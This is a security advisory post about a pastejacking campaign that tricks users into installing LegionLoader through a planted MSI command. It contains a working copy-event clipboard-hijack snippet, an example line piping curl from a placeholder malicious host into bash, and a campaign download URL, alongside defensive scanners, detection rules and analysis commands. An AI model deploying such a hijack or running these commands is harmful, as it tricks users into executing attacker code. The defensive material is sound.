A web campaign uses pastejacking (clipboard hijacking) to lure viewers into installing an MSI carrying LegionLoader malware


A recent campaign uses pastejacking (clipboard hijacking) to trick users into downloading and running an MSI that installs LegionLoader. The lure chain relies on:
– Fake CAPTCHA/Turnstile verification pages to look legitimate.
– Malicious domains dressed up as blog sites.
– Instructions that walk the victim through pasting and running a command the page has planted in their clipboard.

More info: https://bit.ly/4hWXwNM

You Should Know:

How Pastejacking Works

Script on the lure page writes to the clipboard when the visitor copies (or, in the Clipboard API variant, clicks a button), so what lands in the clipboard is not the text that was highlighted. Pasting into a terminal then runs the attacker's command, and a trailing newline in the planted text makes it execute before the user has a chance to read it. For example:
– Text shown on the page: `curl -s https://safe-site.com/install.sh | bash`
– What actually arrives in the clipboard: `curl -s http://malicious-site.com/evil.sh | bash`
In this campaign the planted command delivers an MSI rather than a shell script, but the mechanism is the same.
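To make the mechanism concrete, here is an added example (written for this page, not code from the original post or from Unit42's report): a minimal copy-event hijack of the kind a lure page ships, paired with a static check that flags the same pattern in a page's script text. The payload string, the mock event and the sample lure script are constructed placeholders; the scanner is a heuristic and will also flag legitimate "copy with attribution" scripts, so treat a hit as a prompt to read the script, not as a verdict.

```javascript
// Added example, not from the original post or Unit42's report.
// PAYLOAD is a harmless placeholder standing in for the command a lure page plants.
// The trailing newline matters: a terminal runs a pasted line as soon as it sees it.
const PAYLOAD = "echo pastejacked\n";

// Attacker side: a copy-event handler that swaps whatever the user selected
// for PAYLOAD. setData() writes the clipboard; preventDefault() stops the
// browser from then writing the real selection over it.
function hijackCopy(event) {
  event.clipboardData.setData("text/plain", PAYLOAD);
  event.preventDefault();
  return PAYLOAD;
}

// Only attaches when a DOM exists, so the file also runs under Node.
if (typeof document !== "undefined") {
  document.addEventListener("copy", hijackCopy);
}

// Defender side: heuristic scan of inline script text for the two variants
// of pastejacking. Legitimate "copy with attribution" scripts match the
// first rule too, so a hit means "read this script", not "malicious".
function findClipboardHijack(script) {
  const findings = [];
  const copyListener =
    /addEventListener\s*\(\s*['"]copy['"]/.test(script) || /\boncopy\s*=/.test(script);
  const setsClipboard = /clipboardData\s*\.\s*setData\s*\(/.test(script);
  const blocksDefault = /preventDefault\s*\(/.test(script);
  if (copyListener && setsClipboard && blocksDefault) {
    findings.push("copy handler overwrites the clipboard and suppresses the real selection");
  }
  if (/navigator\s*\.\s*clipboard\s*\.\s*writeText\s*\(/.test(script)) {
    findings.push("writes the clipboard via navigator.clipboard.writeText (click-triggered variant)");
  }
  return findings;
}

// Drives both sides without a browser: a mock ClipboardEvent records what the
// handler did, and a constructed lure script is fed to the scanner.
function demo() {
  const captured = { text: null, prevented: false };
  const mockEvent = {
    clipboardData: { setData: (_type, text) => { captured.text = text; } },
    preventDefault: () => { captured.prevented = true; },
  };
  hijackCopy(mockEvent);

  const lureScript = `
    document.addEventListener('copy', function (e) {
      e.clipboardData.setData('text/plain', cmd);
      e.preventDefault();
    });`;
  return { captured, findings: findClipboardHijack(lureScript) };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Running the file under Node prints what the mock clipboard received (the payload, newline included) and the scanner's finding for the constructed lure script. In a real investigation, feed `findClipboardHijack` the inline `<script>` bodies pulled from the suspicious page, then read whatever it flags.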

Detection & Prevention

1. Verify Before Pasting

  • On Linux: dump the clipboard with `xclip -o -selection clipboard | cat -e` (X11) or `wl-paste | cat -e` (Wayland); on macOS: `pbpaste | cat -e`. The `-e` prints a `$` at each line end, so a trailing newline that would auto-run the command is visible. Terminal shortcuts such as `Ctrl+Shift+V` paste, they do not inspect; if you want to read a command, paste it into a text editor first.
  • On Windows: `Win+V` shows clipboard history (when enabled), or run `Get-Clipboard` in PowerShell. `clipbrd.exe` was removed after Windows XP.

2. Keep Pasted Text from Executing Automatically

  • On Linux/macOS, enable bracketed paste in readline (`set enable-bracketed-paste on` in `~/.inputrc`; bash 5.1 and later have it on by default) so a pasted block, newlines included, sits on the prompt until you press Enter. Most terminals can also warn on multi-line paste.
  • On Windows, turning off clipboard history and cross-device sync (Settings > System > Clipboard) limits where hijacked content ends up, but the real control is procedural: no legitimate "verification" step asks you to open the Run dialog or a terminal and paste a command.

3. Check URLs Before Downloading

  • Use `curl -sI` (add `-L` to follow redirects) from an isolated host to look at the response headers, in particular `Content-Type`, `Content-Disposition` and any `Location` hop, before fetching the file itself.
  • Example:
    curl -sIL https://yoyep.co.za/download.msi

4. Monitor Suspicious Processes

  • Linux/macOS: `ps aux | grep -iE 'curl|wget'` (or `pgrep -af 'curl|wget'`), paying attention to command lines piped into a shell. `msiexec` does not exist on these platforms.
  • Windows: `tasklist | findstr /i msiexec` shows whether Windows Installer is running; to see what it was handed, including any remote URL after `/i`, use PowerShell:
    Get-CimInstance Win32_Process -Filter "Name='msiexec.exe'" | Select-Object ProcessId,ParentProcessId,CommandLine

5. Block Malicious Domains

  • Add an entry to `/etc/hosts` (Linux/macOS) or `C:\Windows\System32\drivers\etc\hosts` (Windows). Prefer your DNS filter where you have one, since the hosts file is trivial for malware to rewrite:
    127.0.0.1 yoyep.co.za

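Step 1 above says to inspect the clipboard before pasting; the added example below (written for this page, not from the original post) turns that into a repeatable triage: feed it the clipboard text from `pbpaste`, `xclip -o` or `Get-Clipboard` and, if you know what the page displayed, that string too. The rules, the sample strings and the `example.invalid` URL are constructed for the demo; `malicious-site.com` is the placeholder used earlier on this page.

```javascript
// Added example, not from the original post. Triage text pulled from the
// clipboard before it is pasted into a shell or the Run dialog.

// Each rule names a pastejacking tell and why it matters.
const RULES = [
  { name: "pipe-to-interpreter",
    re: /\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b|\|\s*(?:python3?|perl|node)\b/i,
    why: "the download runs immediately; nothing lands on disk to inspect" },
  { name: "remote-msi",
    re: /msiexec(?:\.exe)?\b[^\n]*\/i\s+["']?https?:/i,
    why: "Windows Installer fetches and runs a package straight from a URL" },
  { name: "encoded-powershell",
    re: /powershell(?:\.exe)?\b[^\n]*\s-(?:e|ec|enc|encodedcommand)\b/i,
    why: "a base64 blob hides what actually runs" },
  { name: "download-cradle",
    re: /\b(?:curl|wget|iwr|invoke-webrequest|mshta|certutil)\b[^\n]*https?:\/\//i,
    why: "pulls something from the network" },
  { name: "trailing-newline",
    re: /[\r\n][ \t]*$/,
    why: "a terminal executes the line the moment it is pasted" },
  { name: "hidden-characters",
    re: /[\u200b-\u200f\u2028\u2029\ufeff]/,
    why: "zero-width or separator characters disguise the command's shape" },
];

// Returns every rule that fires. If `shown` (the text the page displayed) is
// supplied, any mismatch with the clipboard is itself reported.
function triagePaste(clipboard, shown) {
  const hits = RULES.filter((r) => r.re.test(clipboard)).map(({ name, why }) => ({ name, why }));
  if (shown !== undefined && shown.trim() !== clipboard.trim()) {
    hits.push({ name: "differs-from-displayed",
                why: "clipboard content is not what was highlighted on the page" });
  }
  return { suspicious: hits.length > 0, hits };
}

// Constructed samples (not from the campaign): what a page showed, what the
// copy handler planted instead, and a Windows-style remote installer one-liner.
const SHOWN = "git clone https://github.com/example/tool.git";
const PLANTED = "curl -s http://malicious-site.com/evil.sh | bash\n";
const RUN_DIALOG = 'msiexec /i "https://example.invalid/update.msi" /qn';

// Human-readable verdict for one clipboard dump.
function report(label, clipboard, shown) {
  const result = triagePaste(clipboard, shown);
  const lines = [`${label}: ${result.suspicious ? "DO NOT PASTE" : "looks plain"}`];
  for (const h of result.hits) lines.push(`  - ${h.name}: ${h.why}`);
  return lines.join("\n");
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(report("shown", SHOWN));
  console.log(report("clipboard", PLANTED, SHOWN));
  console.log(report("run dialog", RUN_DIALOG));
}
```

The rules are deliberately narrow tells rather than a malware signature: a benign command can still trip `download-cradle`, and a payload can be written to dodge every regex, which is why the `differs-from-displayed` comparison and the trailing-newline check carry the most weight. Read anything flagged before you paste it.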

Malware Analysis Commands

Work on a copy inside an isolated VM with no route to the real network.

  • Record the hash first (and again after any transform, so findings tie to a specific sample):
    sha256sum LegionLoader.msi

  • Extract the MSI contents (msitools):
    msiextract LegionLoader.msi

  • Dump the CustomAction table, which is where an installer declares the code it runs during setup:
    msiinfo export LegionLoader.msi CustomAction

  • Capture traffic to the distribution host. tcpdump resolves the name once at start-up, so capture by IP as well if the host resolves to several addresses:
    tcpdump -i eth0 'host yoyep.co.za' -w traffic.pcap


What Undercode Say

Pastejacking exploits user trust in copy-paste actions. Always:

  • Audit clipboard content before execution; what you saw highlighted and what you are about to paste can be two different strings.
  • Never pipe a download straight into a shell. Fetch to a file first (`curl -O` or `wget`) and read it. The `-s` in `curl -s … | bash` silences curl precisely so the fetch shows nothing; `--show-progress` is a wget option, and no progress flag detects anything on its own.
  • Monitor child processes spawned by a shell or installer with:
    strace -f -e trace=execve -s 256 -p <PID>

  • On Windows, PowerShell execution policy (`Set-ExecutionPolicy -ExecutionPolicy Restricted`) governs only `.ps1` scripts and does nothing for MSI packages. Restrict installers with AppLocker Windows Installer rules or WDAC (allow only publisher-signed packages), and consider the `DisableMSI` policy (Windows Installer > Turn off Windows Installer) for users who should not be installing software at all.


LegionLoader campaign uses CAPTCHA cloaking & pastejacking. Verify before pasting! 

References:

Reported by: Unit42 (pastejacking campaign), via Hackers Feeds
